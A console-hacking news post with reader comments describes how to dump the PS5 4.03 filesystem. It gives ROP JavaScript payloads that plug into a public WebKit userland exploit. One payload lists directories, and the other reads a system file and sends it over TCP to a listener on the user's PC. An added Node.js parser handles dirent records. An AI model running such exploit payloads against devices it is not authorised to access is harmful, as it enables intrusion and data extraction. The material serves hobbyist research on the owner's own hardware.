PS5 Hacking: Script to dump the PS5 4.03 filesystem released
PlayStation hacker Bigboss, via Zecoxao, has provided the ROP scripts to list and dump the PS5 filesystem on 4.03, through the webkit exploit. This will of course not let you dump all files, only the ones accessible under the webkit process’s permissions, but it could still give us quite an insight into the PS5 files.
Dumping the PS5 4.03 FileSystem – how to
- Probably obvious, but you’ll need a PS5 running firmware 4.03; this will not work on any other firmware.
- You will need to modify the ROP userland execution (released by ChendoChap and ZnullPtr a while ago). You can get the files here.
- After line 650 of exploit.js (alert(`sys_getpid: ${pid}`);), you’ll probably want to delete the sample sections (Threading Sample and Branch Sample), and replace them with Bigboss’ code below.
- Host the resulting files on your favorite server and load the index.html through the PS5 Browser (you can for example use one of Al-Azif‘s DNS servers, 165.227.83.145 or 192.241.221.79, then access the “user guide” page from your PS5, then use the URL redirector).
A) To list the files and folders (this will also give you the name of your “sandbox” string, a semi-random folder name specific to you):
let directory=malloc(256,1);
p.writestr(directory.add32(0),"/");
let retopen=await chain.syscall(5,directory,0,0); // open("/")
let directoryBuffer=malloc(1024*1024,1);
let directorySize=1024*1024;
let retgetdent=await chain.syscall(272,retopen,directoryBuffer,directorySize); // getdents(fd, buf, size)
let numbytes=parseInt(retgetdent,16);
let entry;
let num_entry=0;
let d_fileno; let d_reclen; let d_type; let d_namelen; let d_name;
let position=0;
// walk the dirent records: uint32 d_fileno, uint16 d_reclen, uint8 d_type, uint8 d_namlen, char d_name[]
for(position=0;position<numbytes;){
  entry=directoryBuffer.add32(position);
  d_fileno=p.read4(entry.add32(0));
  d_reclen=p.read2(entry.add32(4));
  d_type=p.read1(entry.add32(6));
  d_namelen=p.read1(entry.add32(7));
  d_name=p.readstr(entry.add32(8));
  alert(`num_entry=${num_entry} d_reclen=${d_reclen} d_type=${d_type} d_namelen=${d_namelen} d_name=${d_name} position=${position}`);
  if(d_reclen==0) break; // a zero-length record would otherwise loop forever
  position=position+d_reclen;
  num_entry++;
}
(source)
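For readers who want to understand what that loop is walking, here is the same record layout parsed on a constructed buffer in plain Node.js. This is an added illustration, not part of Bigboss’ script: it adds the truncated-record and zero-length checks the listing above lacks, and the DT_DIR/DT_REG values are the FreeBSD d_type constants.

```javascript
// FreeBSD-style getdents(2) records, as walked by the listing script above:
//   uint32 d_fileno, uint16 d_reclen, uint8 d_type, uint8 d_namlen, char d_name[]
// Little-endian fields, each record padded to a 4-byte boundary.
const DT_DIR = 4; // FreeBSD d_type values
const DT_REG = 8;

function parseDirents(buf, numBytes) {
  const view = new DataView(buf.buffer, buf.byteOffset, buf.byteLength);
  const entries = [];
  let position = 0;
  while (position + 8 <= numBytes) {
    const d_fileno = view.getUint32(position, true);
    const d_reclen = view.getUint16(position + 4, true);
    const d_type = view.getUint8(position + 6);
    const d_namlen = view.getUint8(position + 7);
    // A short or zero d_reclen would make a naive loop spin or read past the data.
    if (d_reclen < 8 + d_namlen || position + d_reclen > numBytes) break;
    const d_name = new TextDecoder().decode(buf.subarray(position + 8, position + 8 + d_namlen));
    entries.push({ d_fileno, d_reclen, d_type, d_namlen, d_name });
    position += d_reclen;
  }
  return entries;
}

// Lay out one record the way the kernel does, to build constructed test input.
function encodeDirent(fileno, type, name) {
  const nameBytes = new TextEncoder().encode(name);
  const reclen = (8 + nameBytes.length + 1 + 3) & ~3; // header + name + NUL, 4-byte aligned
  const rec = new Uint8Array(reclen);
  const view = new DataView(rec.buffer);
  view.setUint32(0, fileno, true);
  view.setUint16(4, reclen, true);
  view.setUint8(6, type);
  view.setUint8(7, nameBytes.length);
  rec.set(nameBytes, 8);
  return rec;
}

function concatRecords(records) {
  const out = new Uint8Array(records.reduce((n, r) => n + r.length, 0));
  let off = 0;
  for (const r of records) { out.set(r, off); off += r.length; }
  return out;
}

// Constructed sample listing (not a capture from a console).
const SAMPLE = concatRecords([
  encodeDirent(2, DT_DIR, "."), encodeDirent(2, DT_DIR, ".."),
  encodeDirent(10, DT_DIR, "common"), encodeDirent(11, DT_REG, "file.bin"),
]);
```

Calling parseDirents(SAMPLE, SAMPLE.length) yields four entries; passing a smaller byte count, as a short getdents return would, stops cleanly at the last complete record.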
B) To dump a file to a target file on your computer:
//POST EXPLOIT STUFF HERE
//change once per file name
//use for example in your pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:ScePlayReady.self,creat,trunc
let tcpsocket=await chain.syscall(97,2,1,0); // socket(AF_INET, SOCK_STREAM, 0)
alert(`sys_socket: ${tcpsocket}`);
let tcpsocketaddr=malloc(16,1);              // struct sockaddr_in
p.write1(tcpsocketaddr.add32(1),2);          // sin_family = AF_INET
p.write2(tcpsocketaddr.add32(2),0x1247);     // sin_port, byte-swapped: 0x4712 = 18194
//change ip for your pc
p.write4(tcpsocketaddr.add32(4),0xCD01A8C0); //192(C0)168(A8)1(01)205(CD)
alert(`before sys_connect`);
let ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
alert(`sys_connect: ${ret_tcpconnect}`);
//the right way is to use stat get size but this is quick and dirty test
let tcpmessage=malloc(34406400,1);
let tcpmessage_size=34406400;
let file=malloc(256,1);
p.writestr(file.add32(0),"/RcDZV3xbd4/common/lib/ScePlayReady.self"); //example path /RcDZV3xbd4/common/lib/ScePlayReady.self, change RcDZV3xbd4 to your sandbox string
let retopen_file=await chain.syscall(5,file,0,0);
alert(`syscall_open return ${retopen_file}\n`);
let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size);
alert(`before sys_sendto read ${file_read}`);
let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`);
let ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
//size used was for a self file
//after all this your ScePlayReady.self file is created and closed
(source)
Obviously people who have already been working on hacking the PS5 have probably already dumped the files through this mechanism (and, most likely, have been able to investigate even more files through other means), but for those of us who just want to tag along and see how these things are done, this is a pretty straightforward way to get into PS5 hacking and tinkering.
Do you own a PS5 running 4.03? Or have you given up on getting a PS5, let alone one for Jailbreaking purposes? Let me know in the comments.
source: Zecoxao
First
Hello world
I remember when wololo actually had a consistent news stream. Gone are the great days of PSP homebrew comps; new consoles suck and you’d be better off looking at a PC.
Yeah, but those were different days. We had more people helping with the site, I had less “IRL” stuff to deal with, and more generally the scene was thriving much more, with actual homebrew releases, etc…
It might come back with the PS5, who knows.
With all that being said, it’s very unlikely I would ever do anything as huge as the Genesis competition. Organizing this homebrew competition for the PSP drained me for like 6 months.
Is there a way to tell what firmware the PS5 is on by serial number? I know this was possible with the Nintendo Switch.
I bought one back in November or December and kept it sealed but wondering if it’s on 4.03 or not. Otherwise I might as well sell it for profit
Unfortunately there is no such database. However, I just recently acquired a second PS5 from Walmart last month and it came with 4.03 (I think I got really lucky as other people who bought at the same time as me had higher firmwares). So chances are good that you have 4.03 or below.
Thanks for sharing this, you don’t know how many sites I visit for this. Thanks again!
Got a launch PS5, never updated, still sitting in its box, waiting patiently for a jailbreak. Only tested it to make sure it works. I don’t play online, so no problem for me to wait.
Love the look of the PS5 slim, I’m going to have to get one now.
still waiting lol
Nooice
hoping for more reveals soon
Got a new one sitting in the box. Don’t even know what firmware it is – waiting for a confirmed hack then I will get to smell the ‘new electronic smell’….some day!
Not like it matters if the PS5 gets hacked anytime soon. The exclusives are great but if you already have a PS4 you aren’t missing out on much besides the 120hz 1080p over HDMI 2.0b
Honestly I’d love a hacked ps5 just to play Bloodborne at 60fps 1080p which was already done on a debug console.
Can’t wait for what’s coming in the scene.. stupidly updated my 0.0 console to play online and can’t find a single console under 4.50 these days and I’ve been through about 7.. absolutely great work from the scene members and moonbsd for his recent kernel disclosure… #ExcitedIsAnUnderstatement
I have a PS5 on 4.03, I can’t wait.